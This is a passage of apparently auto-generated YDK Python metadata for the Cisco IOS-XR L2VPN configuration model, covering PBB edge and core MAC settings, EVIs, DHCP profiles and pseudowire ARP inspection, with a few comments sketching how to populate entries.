'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
False,
[
_MetaInfoClassMember('pbb-edge-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_edge_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which
MAC limit action is taken
''',
'pbb_edge_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_edge_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
                ''' MAC Aging Time
''',
'pbb_edge_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_edge_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
False,
[
_MetaInfoClassMember('accept-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Accept the virtual instance port being
                shut down on MAC violation
''',
'accept_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Virtual instance port MAC
Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging', REFERENCE_CLASS, 'PbbEdgeMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_edge_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
                ''' Enable MAC Learning
''',
'pbb_edge_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit', REFERENCE_CLASS, 'PbbEdgeMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_edge_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-secure', REFERENCE_CLASS, 'PbbEdgeMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
[], [],
''' MAC Secure
''',
'pbb_edge_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
False,
[
_MetaInfoClassMember('core-bd-name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Core BD Name
''',
'core_bd_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('isid', ATTRIBUTE, 'int' , None, None,
[('256', '16777214')], [],
''' ISID
''',
'isid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pbb-edge-dhcp-profile', REFERENCE_CLASS, 'PbbEdgeDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_edge_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an IGMP Snooping profile
''',
'pbb_edge_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac', REFERENCE_CLASS, 'PbbEdgeMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
[], [],
''' MAC configuration commands
''',
'pbb_edge_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-static-mac-mappings', REFERENCE_CLASS, 'PbbStaticMacMappings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
[], [],
                ''' PBB Static MAC Address Mapping Table
''',
'pbb_static_mac_mappings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('unknown-unicast-bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Configure Unknown Unicast BMAC address
for PBB Edge Port
''',
'unknown_unicast_bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
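    # Sketch for creating a pbb-edge entry (same YDK assumptions): both keys
    # must be set before the entry is appended to the list.
    #
    #   edge = bd.bridge_domain_pbb.pbb_edges.PbbEdge()
    #   edge.isid = 4096                              # key, 256..16777214
    #   edge.core_bd_name = 'core-bd'                 # key, string of length 0..27
    #   bd.bridge_domain_pbb.pbb_edges.pbb_edge.append(edge)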
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
False,
[
_MetaInfoClassMember('pbb-edge', REFERENCE_LIST, 'PbbEdge' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
[], [],
''' Configure BD as PBB Edge with ISID and
associated PBB Core BD
''',
'pbb_edge',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edges',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
                ''' MAC Aging Time
''',
'pbb_core_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_core_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
False,
[
_MetaInfoClassMember('pbb-core-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_core_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'pbb_core_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_core_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging', REFERENCE_CLASS, 'PbbCoreMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_core_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
                ''' Enable MAC Learning
''',
'pbb_core_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit', REFERENCE_CLASS, 'PbbCoreMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_core_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
False,
[
_MetaInfoClassMember('pbb-core-evi', REFERENCE_LIST, 'PbbCoreEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
[], [],
''' PBB Core EVI
''',
'pbb_core_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain PBB Core
Configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-dhcp-profile', REFERENCE_CLASS, 'PbbCoreDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_core_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-evis', REFERENCE_CLASS, 'PbbCoreEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
[], [],
''' PBB Core EVI Table
''',
'pbb_core_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an IGMP Snooping profile
''',
'pbb_core_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac', REFERENCE_CLASS, 'PbbCoreMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
[], [],
''' MAC configuration commands
''',
'pbb_core_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mmrp-flood-optimization', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Enable MMRP PBB-VPLS Flood Optimization
''',
'pbb_core_mmrp_flood_optimization',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-id', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' VLAN ID to push
''',
'vlan_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
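    # Sketch for the pbb-core node above (same YDK assumptions): 'enable' is an
    # empty leaf, so it takes YDK's Empty marker rather than a boolean.
    #
    #   from ydk.types import Empty
    #   core = bd.bridge_domain_pbb.pbb_core
    #   core.enable = Empty()
    #   core.vlan_id = 100                            # 1..4094
    #   evi = core.pbb_core_evis.PbbCoreEvi()
    #   evi.eviid = 1000                              # key, 1..4294967295
    #   core.pbb_core_evis.pbb_core_evi.append(evi)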
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
False,
[
_MetaInfoClassMember('pbb-core', REFERENCE_CLASS, 'PbbCore' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
[], [],
''' PBB Core
''',
'pbb_core',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edges', REFERENCE_CLASS, 'PbbEdges' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
[], [],
''' PBB Edge
''',
'pbb_edges',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
False,
[
_MetaInfoClassMember('bridge-domain-evi', REFERENCE_LIST, 'BridgeDomainEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
[], [],
''' Bridge Domain EVI
''',
'bridge_domain_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
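    # Sketch for attaching an EVI directly to a bridge domain (same YDK
    # assumptions):
    #
    #   evi = bd.bridge_domain_evis.BridgeDomainEvi()
    #   evi.eviid = 2000                              # key, 1..4294967295
    #   bd.bridge_domain_evis.bridge_domain_evi.append(evi)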
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic ARP Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Access Pseudowire Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai-address-validation', REFERENCE_CLASS, 'PseudowireDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
[], [],
''' Address Validation
''',
'pseudowire_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
                ''' Kilobits Per Second; PktsPerSec and KbitsPerSec
                cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
